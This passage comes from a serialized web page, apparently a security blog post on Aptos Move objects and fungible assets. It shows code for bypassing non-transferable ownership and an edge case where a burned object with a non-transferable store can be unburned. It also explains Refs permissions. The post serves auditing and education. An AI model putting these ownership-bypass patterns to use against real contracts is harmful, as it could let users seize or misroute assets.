"line":244},[71586,71591,71595],{"type":27,"tag":207,"props":71587,"children":71588},{"style":238},[71589],{"type":33,"value":71590}," [",{"type":27,"tag":207,"props":71592,"children":71593},{"style":226},[71594],{"type":33,"value":16867},{"type":27,"tag":207,"props":71596,"children":71597},{"style":238},[71598],{"type":33,"value":19050},{"type":27,"tag":207,"props":71600,"children":71601},{"class":209,"line":270},[71602,71607,71611,71615,71620,71625],{"type":27,"tag":207,"props":71603,"children":71604},{"style":376},[71605],{"type":33,"value":71606}," while",{"type":27,"tag":207,"props":71608,"children":71609},{"style":238},[71610],{"type":33,"value":686},{"type":27,"tag":207,"props":71612,"children":71613},{"style":220},[71614],{"type":33,"value":22884},{"type":27,"tag":207,"props":71616,"children":71617},{"style":226},[71618],{"type":33,"value":71619}," !=",{"type":27,"tag":207,"props":71621,"children":71622},{"style":220},[71623],{"type":33,"value":71624}," current_address",{"type":27,"tag":207,"props":71626,"children":71627},{"style":238},[71628],{"type":33,"value":1424},{"type":27,"tag":207,"props":71630,"children":71631},{"class":209,"line":296},[71632,71637,71641,71646,71650,71654],{"type":27,"tag":207,"props":71633,"children":71634},{"style":220},[71635],{"type":33,"value":71636}," count",{"type":27,"tag":207,"props":71638,"children":71639},{"style":226},[71640],{"type":33,"value":229},{"type":27,"tag":207,"props":71642,"children":71643},{"style":220},[71644],{"type":33,"value":71645}," count",{"type":27,"tag":207,"props":71647,"children":71648},{"style":226},[71649],{"type":33,"value":1374},{"type":27,"tag":207,"props":71651,"children":71652},{"style":232},[71653],{"type":33,"value":235},{"type":27,"tag":207,"props":71655,"children":71656},{"style":238},[71657],{"type":33,"value":241},{"type":27,"tag":207,"props":71659,"children":71660},{"class":209,"line":445},[71661,71665,71669],{"type":27,"tag":207,"props":71662,"children":71663},{"style":238},[71664],{"type":33,"value":71590},{"type":27,"tag":207,"props":71666,"children":71667},{"style":226},[71668],{"type":33,"value":16867},{"type":27,"tag":207,"props":71670,"children":71671},{"style":238},[71672],{"type":33,"value":19050},{"type":27,"tag":207,"props":71674,"children":71675},{"class":209,"line":867},[71676,71681],{"type":27,"tag":207,"props":71677,"children":71678},{"style":1335},[71679],{"type":33,"value":71680}," assert!",{"type":27,"tag":207,"props":71682,"children":71683},{"style":238},[71684],{"type":33,"value":9090},{"type":27,"tag":207,"props":71686,"children":71687},{"class":209,"line":892},[71688,71693,71697,71702,71706,71711],{"type":27,"tag":207,"props":71689,"children":71690},{"style":220},[71691],{"type":33,"value":71692}," exists",{"type":27,"tag":207,"props":71694,"children":71695},{"style":238},[71696],{"type":33,"value":9257},{"type":27,"tag":207,"props":71698,"children":71699},{"style":8920},[71700],{"type":33,"value":71701},"ObjectCore",{"type":27,"tag":207,"props":71703,"children":71704},{"style":238},[71705],{"type":33,"value":14893},{"type":27,"tag":207,"props":71707,"children":71708},{"style":220},[71709],{"type":33,"value":71710},"current_address",{"type":27,"tag":207,"props":71712,"children":71713},{"style":238},[71714],{"type":33,"value":14018},{"type":27,"tag":207,"props":71716,"children":71717},{"class":209,"line":1475},[71718,71723,71727,71731],{"type":27,"tag":207,"props":71719,"children":71720},{"style":238},[71721],{"type":33,"value":71722}," error",{"type":27,"tag":207,"props":71724,"children":71725},{"style":226},[71726],{"type":33,"value":10768},{"type":27,"tag":207,"props":71728,"children":71729},{"style":1335},[71730],{"type":33,"value":71051},{"type":27,"tag":207,"props":71732,"children":71733},{"style":238},[71734],{"type":33,"value":71735},"(ENOT_OBJECT_OWNER),\n",{"type":27,"tag":207,"props":71737,"children":71738},{"class":209,"line":2065},[71739],{"type":27,"tag":207,"props":71740,"children":71741},{"style":238},[71742],{"type":33,"value":15026},{"type":27,"tag":207,"props":71744,"children":71745},{"class":209,"line":2092},[71746,71750,71754,71758,71763,71767,71771,71775,71779],{"type":27,"tag":207,"props":71747,"children":71748},{"style":214},[71749],{"type":33,"value":10353},{"type":27,"tag":207,"props":71751,"children":71752},{"style":220},[71753],{"type":33,"value":69726},{"type":27,"tag":207,"props":71755,"children":71756},{"style":226},[71757],{"type":33,"value":229},{"type":27,"tag":207,"props":71759,"children":71760},{"style":220},[71761],{"type":33,"value":71762}," borrow_global",{"type":27,"tag":207,"props":71764,"children":71765},{"style":238},[71766],{"type":33,"value":9257},{"type":27,"tag":207,"props":71768,"children":71769},{"style":8920},[71770],{"type":33,"value":71701},{"type":27,"tag":207,"props":71772,"children":71773},{"style":238},[71774],{"type":33,"value":14893},{"type":27,"tag":207,"props":71776,"children":71777},{"style":220},[71778],{"type":33,"value":71710},{"type":27,"tag":207,"props":71780,"children":71781},{"style":238},[71782],{"type":33,"value":1455},{"type":27,"tag":207,"props":71784,"children":71785},{"class":209,"line":2130},[71786,71791,71795,71799,71803],{"type":27,"tag":207,"props":71787,"children":71788},{"style":220},[71789],{"type":33,"value":71790}," current_address",{"type":27,"tag":207,"props":71792,"children":71793},{"style":226},[71794],{"type":33,"value":229},{"type":27,"tag":207,"props":71796,"children":71797},{"style":220},[71798],{"type":33,"value":69726},{"type":27,"tag":207,"props":71800,"children":71801},{"style":226},[71802],{"type":33,"value":1041},{"type":27,"tag":207,"props":71804,"children":71805},{"style":238},[71806],{"type":33,"value":71807},"owner;\n",{"type":27,"tag":207,"props":71809,"children":71810},{"class":209,"line":2168},[71811],{"type":27,"tag":207,"props":71812,"children":71813},{"style":238},[71814],{"type":33,"value":46243},{"type":27,"tag":207,"props":71816,"children":71817},{"class":209,"line":4095},[71818],{"type":27,"tag":207,"props":71819,"children":71820},{"style":238},[71821],{"type":33,"value":451},{"type":27,"tag":36,"props":71823,"children":71824},{},[71825,71827,71832],{"type":33,"value":71826},"This could allow for bypassing assumptions about ",{"type":27,"tag":84,"props":71828,"children":71830},{"className":71829},[],[71831],{"type":33,"value":69308},{"type":33,"value":71833}," true ownership and its non-transferability.",{"type":27,"tag":101,"props":71835,"children":71837},{"className":10270,"code":71836,"language":10269,"meta":7,"style":7},"public fun untransferable_transfer(caller: &signer, receipient: address) {\n let constructor_ref = object::create_object(signer::address_of(caller));\n let object_addr = object::address_from_constructor_ref(&constructor_ref);\n let store = primary_fungible_store::ensure_primary_store_exists(object_addr, get_metadata());\n\n object::transfer_raw(caller, object_addr, receipient);\n //receipient can interact with store by using their signer\n}\n",[71838],{"type":27,"tag":84,"props":71839,"children":71840},{"__ignoreMap":7},[71841,71899,71952,71996,72044,72051,72096,72104],{"type":27,"tag":207,"props":71842,"children":71843},{"class":209,"line":210},[71844,71848,71852,71857,71861,71866,71870,71874,71878,71882,71887,71891,71895],{"type":27,"tag":207,"props":71845,"children":71846},{"style":220},[71847],{"type":33,"value":68907},{"type":27,"tag":207,"props":71849,"children":71850},{"style":220},[71851],{"type":33,"value":13489},{"type":27,"tag":207,"props":71853,"children":71854},{"style":1335},[71855],{"type":33,"value":71856}," untransferable_transfer",{"type":27,"tag":207,"props":71858,"children":71859},{"style":238},[71860],{"type":33,"value":1343},{"type":27,"tag":207,"props":71862,"children":71863},{"style":220},[71864],{"type":33,"value":71865},"caller",{"type":27,"tag":207,"props":71867,"children":71868},{"style":226},[71869],{"type":33,"value":736},{"type":27,"tag":207,"props":71871,"children":71872},{"style":226},[71873],{"type":33,"value":14423},{"type":27,"tag":207,"props":71875,"children":71876},{"style":220},[71877],{"type":33,"value":14428},{"type":27,"tag":207,"props":71879,"children":71880},{"style":238},[71881],{"type":33,"value":1123},{"type":27,"tag":207,"props":71883,"children":71884},{"style":220},[71885],{"type":33,"value":71886},"receipient",{"type":27,"tag":207,"props":71888,"children":71889},{"style":226},[71890],{"type":33,"value":736},{"type":27,"tag":207,"props":71892,"children":71893},{"style":220},[71894],{"type":33,"value":13532},{"type":27,"tag":207,"props":71896,"children":71897},{"style":238},[71898],{"type":33,"value":1424},{"type":27,"tag":207,"props":71900,"children":71901},{"class":209,"line":244},[71902,71906,71911,71915,71919,71923,71928,71932,71936,71940,71944,71948],{"type":27,"tag":207,"props":71903,"children":71904},{"style":214},[71905],{"type":33,"value":10290},{"type":27,"tag":207,"props":71907,"children":71908},{"style":220},[71909],{"type":33,"value":71910}," constructor_ref",{"type":27,"tag":207,"props":71912,"children":71913},{"style":226},[71914],{"type":33,"value":229},{"type":27,"tag":207,"props":71916,"children":71917},{"style":238},[71918],{"type":33,"value":69726},{"type":27,"tag":207,"props":71920,"children":71921},{"style":226},[71922],{"type":33,"value":10768},{"type":27,"tag":207,"props":71924,"children":71925},{"style":1335},[71926],{"type":33,"value":71927},"create_object",{"type":27,"tag":207,"props":71929,"children":71930},{"style":238},[71931],{"type":33,"value":14482},{"type":27,"tag":207,"props":71933,"children":71934},{"style":226},[71935],{"type":33,"value":10768},{"type":27,"tag":207,"props":71937,"children":71938},{"style":1335},[71939],{"type":33,"value":14491},{"type":27,"tag":207,"props":71941,"children":71942},{"style":238},[71943],{"type":33,"value":1343},{"type":27,"tag":207,"props":71945,"children":71946},{"style":220},[71947],{"type":33,"value":71865},{"type":27,"tag":207,"props":71949,"children":71950},{"style":238},[71951],{"type":33,"value":14505},{"type":27,"tag":207,"props":71953,"children":71954},{"class":209,"line":270},[71955,71959,71963,71967,71971,71975,71980,71984,71988,71992],{"type":27,"tag":207,"props":71956,"children":71957},{"style":214},[71958],{"type":33,"value":10290},{"type":27,"tag":207,"props":71960,"children":71961},{"style":220},[71962],{"type":33,"value":71313},{"type":27,"tag":207,"props":71964,"children":71965},{"style":226},[71966],{"type":33,"value":229},{"type":27,"tag":207,"props":71968,"children":71969},{"style":238},[71970],{"type":33,"value":69726},{"type":27,"tag":207,"props":71972,"children":71973},{"style":226},[71974],{"type":33,"value":10768},{"type":27,"tag":207,"props":71976,"children":71977},{"style":1335},[71978],{"type":33,"value":71979},"address_from_constructor_ref",{"type":27,"tag":207,"props":71981,"children":71982},{"style":238},[71983],{"type":33,"value":1343},{"type":27,"tag":207,"props":71985,"children":71986},{"style":226},[71987],{"type":33,"value":10398},{"type":27,"tag":207,"props":71989,"children":71990},{"style":220},[71991],{"type":33,"value":70160},{"type":27,"tag":207,"props":71993,"children":71994},{"style":238},[71995],{"type":33,"value":1455},{"type":27,"tag":207,"props":71997,"children":71998},{"class":209,"line":296},[71999,72003,72007,72011,72016,72020,72024,72028,72032,72036,72040],{"type":27,"tag":207,"props":72000,"children":72001},{"style":214},[72002],{"type":33,"value":10290},{"type":27,"tag":207,"props":72004,"children":72005},{"style":220},[72006],{"type":33,"value":13113},{"type":27,"tag":207,"props":72008,"children":72009},{"style":226},[72010],{"type":33,"value":229},{"type":27,"tag":207,"props":72012,"children":72013},{"style":238},[72014],{"type":33,"value":72015}," primary_fungible_store",{"type":27,"tag":207,"props":72017,"children":72018},{"style":226},[72019],{"type":33,"value":10768},{"type":27,"tag":207,"props":72021,"children":72022},{"style":1335},[72023],{"type":33,"value":70052},{"type":27,"tag":207,"props":72025,"children":72026},{"style":238},[72027],{"type":33,"value":1343},{"type":27,"tag":207,"props":72029,"children":72030},{"style":220},[72031],{"type":33,"value":71359},{"type":27,"tag":207,"props":72033,"children":72034},{"style":238},[72035],{"type":33,"value":1123},{"type":27,"tag":207,"props":72037,"children":72038},{"style":1335},[72039],{"type":33,"value":70008},{"type":27,"tag":207,"props":72041,"children":72042},{"style":238},[72043],{"type":33,"value":22700},{"type":27,"tag":207,"props":72045,"children":72046},{"class":209,"line":445},[72047],{"type":27,"tag":207,"props":72048,"children":72049},{"emptyLinePlaceholder":19},[72050],{"type":33,"value":2062},{"type":27,"tag":207,"props":72052,"children":72053},{"class":209,"line":867},[72054,72059,72063,72068,72072,72076,72080,72084,72088,72092],{"type":27,"tag":207,"props":72055,"children":72056},{"style":238},[72057],{"type":33,"value":72058}," object",{"type":27,"tag":207,"props":72060,"children":72061},{"style":226},[72062],{"type":33,"value":10768},{"type":27,"tag":207,"props":72064,"children":72065},{"style":1335},[72066],{"type":33,"value":72067},"transfer_raw",{"type":27,"tag":207,"props":72069,"children":72070},{"style":238},[72071],{"type":33,"value":1343},{"type":27,"tag":207,"props":72073,"children":72074},{"style":220},[72075],{"type":33,"value":71865},{"type":27,"tag":207,"props":72077,"children":72078},{"style":238},[72079],{"type":33,"value":1123},{"type":27,"tag":207,"props":72081,"children":72082},{"style":220},[72083],{"type":33,"value":71359},{"type":27,"tag":207,"props":72085,"children":72086},{"style":238},[72087],{"type":33,"value":1123},{"type":27,"tag":207,"props":72089,"children":72090},{"style":220},[72091],{"type":33,"value":71886},{"type":27,"tag":207,"props":72093,"children":72094},{"style":238},[72095],{"type":33,"value":1455},{"type":27,"tag":207,"props":72097,"children":72098},{"class":209,"line":892},[72099],{"type":27,"tag":207,"props":72100,"children":72101},{"style":4647},[72102],{"type":33,"value":72103}," //receipient can interact with store by using their signer\n",{"type":27,"tag":207,"props":72105,"children":72106},{"class":209,"line":1475},[72107],{"type":27,"tag":207,"props":72108,"children":72109},{"style":238},[72110],{"type":33,"value":451},{"type":27,"tag":36,"props":72112,"children":72113},{},[72114,72116,72123],{"type":33,"value":72115},"The ownership transfer issue also showed up during our review of the fungible asset standard, where we identified an interesting ",{"type":27,"tag":47,"props":72117,"children":72120},{"href":72118,"rel":72119},"https://github.com/aptos-labs/aptos-core/commit/e8c5e4bd03930d25f0dbec9529680fac36eb2fa6",[51],[72121],{"type":33,"value":72122},"edge case",{"type":33,"value":72124}," involving the transfer of a non-transferable fungible store.",{"type":27,"tag":101,"props":72126,"children":72128},{"className":10270,"code":72127,"language":10269,"meta":7,"style":7},"public fun transfer_with_ref(ref: LinearTransferRef, to: address) acquires ObjectCore {\n assert!(!exists\u003CUntransferable>(ref.self), error::permission_denied(ENOT_MOVABLE));\n let object = borrow_global_mut\u003CObjectCore>(ref.self);\n assert!(\n object.owner == ref.owner,\n error::permission_denied(ENOT_OBJECT_OWNER),\n );\n \n [...]\n \n object.owner = to;\n}\n",[72129],{"type":27,"tag":84,"props":72130,"children":72131},{"__ignoreMap":7},[72132,72197,72258,72305,72316,72351,72371,72378,72385,72400,72407,72435],{"type":27,"tag":207,"props":72133,"children":72134},{"class":209,"line":210},[72135,72139,72143,72148,72152,72156,72160,72165,72169,72173,72177,72181,72185,72189,72193],{"type":27,"tag":207,"props":72136,"children":72137},{"style":220},[72138],{"type":33,"value":68907},{"type":27,"tag":207,"props":72140,"children":72141},{"style":220},[72142],{"type":33,"value":13489},{"type":27,"tag":207,"props":72144,"children":72145},{"style":1335},[72146],{"type":33,"value":72147}," transfer_with_ref",{"type":27,"tag":207,"props":72149,"children":72150},{"style":238},[72151],{"type":33,"value":1343},{"type":27,"tag":207,"props":72153,"children":72154},{"style":214},[72155],{"type":33,"value":70569},{"type":27,"tag":207,"props":72157,"children":72158},{"style":226},[72159],{"type":33,"value":736},{"type":27,"tag":207,"props":72161,"children":72162},{"style":8920},[72163],{"type":33,"value":72164}," LinearTransferRef",{"type":27,"tag":207,"props":72166,"children":72167},{"style":238},[72168],{"type":33,"value":1123},{"type":27,"tag":207,"props":72170,"children":72171},{"style":220},[72172],{"type":33,"value":39985},{"type":27,"tag":207,"props":72174,"children":72175},{"style":226},[72176],{"type":33,"value":736},{"type":27,"tag":207,"props":72178,"children":72179},{"style":220},[72180],{"type":33,"value":13532},{"type":27,"tag":207,"props":72182,"children":72183},{"style":238},[72184],{"type":33,"value":2222},{"type":27,"tag":207,"props":72186,"children":72187},{"style":220},[72188],{"type":33,"value":13626},{"type":27,"tag":207,"props":72190,"children":72191},{"style":8920},[72192],{"type":33,"value":71206},{"type":27,"tag":207,"props":72194,"children":72195},{"style":238},[72196],{"type":33,"value":384},{"type":27,"tag":207,"props":72198,"children":72199},{"class":209,"line":244},[72200,72204,72208,72212,72216,72220,72225,72229,72233,72237,72241,72245,72249,72253],{"type":27,"tag":207,"props":72201,"children":72202},{"style":1335},[72203],{"type":33,"value":69576},{"type":27,"tag":207,"props":72205,"children":72206},{"style":238},[72207],{"type":33,"value":1343},{"type":27,"tag":207,"props":72209,"children":72210},{"style":226},[72211],{"type":33,"value":27893},{"type":27,"tag":207,"props":72213,"children":72214},{"style":220},[72215],{"type":33,"value":13986},{"type":27,"tag":207,"props":72217,"children":72218},{"style":238},[72219],{"type":33,"value":9257},{"type":27,"tag":207,"props":72221,"children":72222},{"style":8920},[72223],{"type":33,"value":72224},"Untransferable",{"type":27,"tag":207,"props":72226,"children":72227},{"style":238},[72228],{"type":33,"value":14893},{"type":27,"tag":207,"props":72230,"children":72231},{"style":214},[72232],{"type":33,"value":70569},{"type":27,"tag":207,"props":72234,"children":72235},{"style":226},[72236],{"type":33,"value":1041},{"type":27,"tag":207,"props":72238,"children":72239},{"style":214},[72240],{"type":33,"value":20990},{"type":27,"tag":207,"props":72242,"children":72243},{"style":238},[72244],{"type":33,"value":70165},{"type":27,"tag":207,"props":72246,"children":72247},{"style":226},[72248],{"type":33,"value":10768},{"type":27,"tag":207,"props":72250,"children":72251},{"style":1335},[72252],{"type":33,"value":71051},{"type":27,"tag":207,"props":72254,"children":72255},{"style":238},[72256],{"type":33,"value":72257},"(ENOT_MOVABLE));\n",{"type":27,"tag":207,"props":72259,"children":72260},{"class":209,"line":270},[72261,72265,72269,72273,72277,72281,72285,72289,72293,72297,72301],{"type":27,"tag":207,"props":72262,"children":72263},{"style":214},[72264],{"type":33,"value":10290},{"type":27,"tag":207,"props":72266,"children":72267},{"style":220},[72268],{"type":33,"value":69726},{"type":27,"tag":207,"props":72270,"children":72271},{"style":226},[72272],{"type":33,"value":229},{"type":27,"tag":207,"props":72274,"children":72275},{"style":220},[72276],{"type":33,"value":14879},{"type":27,"tag":207,"props":72278,"children":72279},{"style":238},[72280],{"type":33,"value":9257},{"type":27,"tag":207,"props":72282,"children":72283},{"style":8920},[72284],{"type":33,"value":71701},{"type":27,"tag":207,"props":72286,"children":72287},{"style":238},[72288],{"type":33,"value":14893},{"type":27,"tag":207,"props":72290,"children":72291},{"style":214},[72292],{"type":33,"value":70569},{"type":27,"tag":207,"props":72294,"children":72295},{"style":226},[72296],{"type":33,"value":1041},{"type":27,"tag":207,"props":72298,"children":72299},{"style":214},[72300],{"type":33,"value":20990},{"type":27,"tag":207,"props":72302,"children":72303},{"style":238},[72304],{"type":33,"value":1455},{"type":27,"tag":207,"props":72306,"children":72307},{"class":209,"line":296},[72308,72312],{"type":27,"tag":207,"props":72309,"children":72310},{"style":1335},[72311],{"type":33,"value":69576},{"type":27,"tag":207,"props":72313,"children":72314},{"style":238},[72315],{"type":33,"value":9090},{"type":27,"tag":207,"props":72317,"children":72318},{"class":209,"line":445},[72319,72324,72328,72333,72337,72342,72346],{"type":27,"tag":207,"props":72320,"children":72321},{"style":220},[72322],{"type":33,"value":72323}," object",{"type":27,"tag":207,"props":72325,"children":72326},{"style":226},[72327],{"type":33,"value":1041},{"type":27,"tag":207,"props":72329,"children":72330},{"style":238},[72331],{"type":33,"value":72332},"owner ",{"type":27,"tag":207,"props":72334,"children":72335},{"style":226},[72336],{"type":33,"value":15856},{"type":27,"tag":207,"props":72338,"children":72339},{"style":214},[72340],{"type":33,"value":72341}," ref",{"type":27,"tag":207,"props":72343,"children":72344},{"style":226},[72345],{"type":33,"value":1041},{"type":27,"tag":207,"props":72347,"children":72348},{"style":238},[72349],{"type":33,"value":72350},"owner,\n",{"type":27,"tag":207,"props":72352,"children":72353},{"class":209,"line":867},[72354,72359,72363,72367],{"type":27,"tag":207,"props":72355,"children":72356},{"style":238},[72357],{"type":33,"value":72358}," error",{"type":27,"tag":207,"props":72360,"children":72361},{"style":226},[72362],{"type":33,"value":10768},{"type":27,"tag":207,"props":72364,"children":72365},{"style":1335},[72366],{"type":33,"value":71051},{"type":27,"tag":207,"props":72368,"children":72369},{"style":238},[72370],{"type":33,"value":71735},{"type":27,"tag":207,"props":72372,"children":72373},{"class":209,"line":892},[72374],{"type":27,"tag":207,"props":72375,"children":72376},{"style":238},[72377],{"type":33,"value":50903},{"type":27,"tag":207,"props":72379,"children":72380},{"class":209,"line":1475},[72381],{"type":27,"tag":207,"props":72382,"children":72383},{"style":238},[72384],{"type":33,"value":69018},{"type":27,"tag":207,"props":72386,"children":72387},{"class":209,"line":2065},[72388,72392,72396],{"type":27,"tag":207,"props":72389,"children":72390},{"style":238},[72391],{"type":33,"value":69950},{"type":27,"tag":207,"props":72393,"children":72394},{"style":226},[72395],{"type":33,"value":16867},{"type":27,"tag":207,"props":72397,"children":72398},{"style":238},[72399],{"type":33,"value":19050},{"type":27,"tag":207,"props":72401,"children":72402},{"class":209,"line":2092},[72403],{"type":27,"tag":207,"props":72404,"children":72405},{"style":238},[72406],{"type":33,"value":69018},{"type":27,"tag":207,"props":72408,"children":72409},{"class":209,"line":2130},[72410,72414,72418,72422,72426,72431],{"type":27,"tag":207,"props":72411,"children":72412},{"style":220},[72413],{"type":33,"value":72058},{"type":27,"tag":207,"props":72415,"children":72416},{"style":226},[72417],{"type":33,"value":1041},{"type":27,"tag":207,"props":72419,"children":72420},{"style":238},[72421],{"type":33,"value":72332},{"type":27,"tag":207,"props":72423,"children":72424},{"style":226},[72425],{"type":33,"value":10380},{"type":27,"tag":207,"props":72427,"children":72428},{"style":220},[72429],{"type":33,"value":72430}," to",{"type":27,"tag":207,"props":72432,"children":72433},{"style":238},[72434],{"type":33,"value":241},{"type":27,"tag":207,"props":72436,"children":72437},{"class":209,"line":2168},[72438],{"type":27,"tag":207,"props":72439,"children":72440},{"style":238},[72441],{"type":33,"value":451},{"type":27,"tag":36,"props":72443,"children":72444},{},[72445,72447,72452,72454,72459],{"type":33,"value":72446},"A user could exploit this by creating an object and a transfer permission, burning the object (changing its ownership to the ",{"type":27,"tag":84,"props":72448,"children":72450},{"className":72449},[],[72451],{"type":33,"value":71104},{"type":33,"value":72453},"), transferring it to another user, and then registering a non-transferable fungible store with that object. While the store could no longer be moved using the owner's ",{"type":27,"tag":84,"props":72455,"children":72457},{"className":72456},[],[72458],{"type":33,"value":14428},{"type":33,"value":72460}," or the transfer permission due to non-transferable restrictions, it could be unburned to restore the original ownership!",{"type":27,"tag":58,"props":72462,"children":72464},{"id":72463},"references",[72465],{"type":33,"value":72466},"References",{"type":27,"tag":36,"props":72468,"children":72469},{},[72470,72475,72477,72483,72485,72490,72492,72497],{"type":27,"tag":84,"props":72471,"children":72473},{"className":72472},[],[72474],{"type":33,"value":72466},{"type":33,"value":72476}," are a permission type resource that authenticate a caller for security-critical operations. ",{"type":27,"tag":84,"props":72478,"children":72480},{"className":72479},[],[72481],{"type":33,"value":72482},"Refs",{"type":33,"value":72484}," are based on the ",{"type":27,"tag":84,"props":72486,"children":72488},{"className":72487},[],[72489],{"type":33,"value":9262},{"type":33,"value":72491}," model, but they are also adapted by fungible assets. Some of these are defined by the ",{"type":27,"tag":84,"props":72493,"children":72495},{"className":72494},[],[72496],{"type":33,"value":9262},{"type":33,"value":72498}," itself, while others are created through the fungible asset module. What's more, some are shared between them, while others appear shared but aren’t.",{"type":27,"tag":36,"props":72500,"children":72501},{},[72502,72504,72509,72511,72516,72517,72523,72525,72530,72532,72537],{"type":33,"value":72503},"Let's get back to the ",{"type":27,"tag":84,"props":72505,"children":72507},{"className":72506},[],[72508],{"type":33,"value":69308},{"type":33,"value":72510}," deletion example. Both ",{"type":27,"tag":84,"props":72512,"children":72514},{"className":72513},[],[72515],{"type":33,"value":70593},{"type":33,"value":1131},{"type":27,"tag":84,"props":72518,"children":72520},{"className":72519},[],[72521],{"type":33,"value":72522},"fungible_asset::remove_store",{"type":33,"value":72524}," use the same object-specific ",{"type":27,"tag":84,"props":72526,"children":72528},{"className":72527},[],[72529],{"type":33,"value":70525},{"type":33,"value":72531}," permission. It can be created only during object creation. There is no separate ",{"type":27,"tag":84,"props":72533,"children":72535},{"className":72534},[],[72536],{"type":33,"value":70525},{"type":33,"value":72538}," for fungible assets.",{"type":27,"tag":101,"props":72540,"children":72541},{"className":10270,"code":70475,"language":10269,"meta":7,"style":7},[72542],{"type":27,"tag":84,"props":72543,"children":72544},{"__ignoreMap":7},[72545,72552,72591,72598,72605],{"type":27,"tag":207,"props":72546,"children":72547},{"class":209,"line":210},[72548],{"type":27,"tag":207,"props":72549,"children":72550},{"style":4647},[72551],{"type":33,"value":70487},{"type":27,"tag":207,"props":72553,"children":72554},{"class":209,"line":244},[72555,72559,72563,72567,72571,72575,72579,72583,72587],{"type":27,"tag":207,"props":72556,"children":72557},{"style":220},[72558],{"type":33,"value":68907},{"type":27,"tag":207,"props":72560,"children":72561},{"style":220},[72562],{"type":33,"value":13489},{"type":27,"tag":207,"props":72564,"children":72565},{"style":1335},[72566],{"type":33,"value":70503},{"type":27,"tag":207,"props":72568,"children":72569},{"style":238},[72570],{"type":33,"value":1343},{"type":27,"tag":207,"props":72572,"children":72573},{"style":220},[72574],{"type":33,"value":70512},{"type":27,"tag":207,"props":72576,"children":72577},{"style":226},[72578],{"type":33,"value":736},{"type":27,"tag":207,"props":72580,"children":72581},{"style":226},[72582],{"type":33,"value":14423},{"type":27,"tag":207,"props":72584,"children":72585},{"style":8920},[72586],{"type":33,"value":70525},{"type":27,"tag":207,"props":72588,"children":72589},{"style":238},[72590],{"type":33,"value":10449},{"type":27,"tag":207,"props":72592,"children":72593},{"class":209,"line":270},[72594],{"type":27,"tag":207,"props":72595,"children":72596},{"emptyLinePlaceholder":19},[72597],{"type":33,"value":2062},{"type":27,"tag":207,"props":72599,"children":72600},{"class":209,"line":296},[72601],{"type":27,"tag":207,"props":72602,"children":72603},{"style":4647},[72604],{"type":33,"value":70544},{"type":27,"tag":207,"props":72606,"children":72607},{"class":209,"line":445},[72608,72612,72616,72620,72624,72628,72632,72636],{"type":27,"tag":207,"props":72609,"children":72610},{"style":220},[72611],{"type":33,"value":68907},{"type":27,"tag":207,"props":72613,"children":72614},{"style":220},[72615],{"type":33,"value":13489},{"type":27,"tag":207,"props":72617,"children":72618},{"style":1335},[72619],{"type":33,"value":70560},{"type":27,"tag":207,"props":72621,"children":72622},{"style":238},[72623],{"type":33,"value":1343},{"type":27,"tag":207,"props":72625,"children":72626},{"style":214},[72627],{"type":33,"value":70569},{"type":27,"tag":207,"props":72629,"children":72630},{"style":226},[72631],{"type":33,"value":736},{"type":27,"tag":207,"props":72633,"children":72634},{"style":8920},[72635],{"type":33,"value":70578},{"type":27,"tag":207,"props":72637,"children":72638},{"style":238},[72639],{"type":33,"value":10449},{"type":27,"tag":36,"props":72641,"children":72642},{},[72643,72645,72650,72652,72658],{"type":33,"value":72644},"On the other hand, the \"frozen\" status of a ",{"type":27,"tag":84,"props":72646,"children":72648},{"className":72647},[],[72649],{"type":33,"value":69308},{"type":33,"value":72651}," is toggled using a ",{"type":27,"tag":84,"props":72653,"children":72655},{"className":72654},[],[72656],{"type":33,"value":72657},"TransferRef",{"type":33,"value":72659},", which is defined in both models (and not interchangeable). They also can be created only during object creation.",{"type":27,"tag":101,"props":72661,"children":72663},{"className":10270,"code":72662,"language":10269,"meta":7,"style":7},"public fun set_frozen_flag\u003CT: key>(\n ref: &TransferRef,\n store: Object\u003CT>,\n frozen: bool,\n)\n",[72664],{"type":27,"tag":84,"props":72665,"children":72666},{"__ignoreMap":7},[72667,72703,72727,72754,72773],{"type":27,"tag":207,"props":72668,"children":72669},{"class":209,"line":210},[72670,72674,72678,72683,72687,72691,72695,72699],{"type":27,"tag":207,"props":72671,"children":72672},{"style":220},[72673],{"type":33,"value":68907},{"type":27,"tag":207,"props":72675,"children":72676},{"style":220},[72677],{"type":33,"value":13489},{"type":27,"tag":207,"props":72679,"children":72680},{"style":220},[72681],{"type":33,"value":72682}," set_frozen_flag",{"type":27,"tag":207,"props":72684,"children":72685},{"style":238},[72686],{"type":33,"value":9257},{"type":27,"tag":207,"props":72688,"children":72689},{"style":8920},[72690],{"type":33,"value":13269},{"type":27,"tag":207,"props":72692,"children":72693},{"style":226},[72694],{"type":33,"value":736},{"type":27,"tag":207,"props":72696,"children":72697},{"style":220},[72698],{"type":33,"value":13213},{"type":27,"tag":207,"props":72700,"children":72701},{"style":238},[72702],{"type":33,"value":13870},{"type":27,"tag":207,"props":72704,"children":72705},{"class":209,"line":244},[72706,72711,72715,72719,72723],{"type":27,"tag":207,"props":72707,"children":72708},{"style":214},[72709],{"type":33,"value":72710}," ref",{"type":27,"tag":207,"props":72712,"children":72713},{"style":226},[72714],{"type":33,"value":736},{"type":27,"tag":207,"props":72716,"children":72717},{"style":226},[72718],{"type":33,"value":14423},{"type":27,"tag":207,"props":72720,"children":72721},{"style":8920},[72722],{"type":33,"value":72657},{"type":27,"tag":207,"props":72724,"children":72725},{"style":238},[72726],{"type":33,"value":1842},{"type":27,"tag":207,"props":72728,"children":72729},{"class":209,"line":270},[72730,72734,72738,72742,72746,72750],{"type":27,"tag":207,"props":72731,"children":72732},{"style":220},[72733],{"type":33,"value":36676},{"type":27,"tag":207,"props":72735,"children":72736},{"style":226},[72737],{"type":33,"value":736},{"type":27,"tag":207,"props":72739,"children":72740},{"style":8920},[72741],{"type":33,"value":68793},{"type":27,"tag":207,"props":72743,"children":72744},{"style":238},[72745],{"type":33,"value":9257},{"type":27,"tag":207,"props":72747,"children":72748},{"style":8920},[72749],{"type":33,"value":13269},{"type":27,"tag":207,"props":72751,"children":72752},{"style":238},[72753],{"type":33,"value":13420},{"type":27,"tag":207,"props":72755,"children":72756},{"class":209,"line":296},[72757,72761,72765,72769],{"type":27,"tag":207,"props":72758,"children":72759},{"style":220},[72760],{"type":33,"value":68445},{"type":27,"tag":207,"props":72762,"children":72763},{"style":226},[72764],{"type":33,"value":736},{"type":27,"tag":207,"props":72766,"children":72767},{"style":8920},[72768],{"type":33,"value":19327},{"type":27,"tag":207,"props":72770,"children":72771},{"style":238},[72772],{"type":33,"value":1842},{"type":27,"tag":207,"props":72774,"children":72775},{"class":209,"line":445}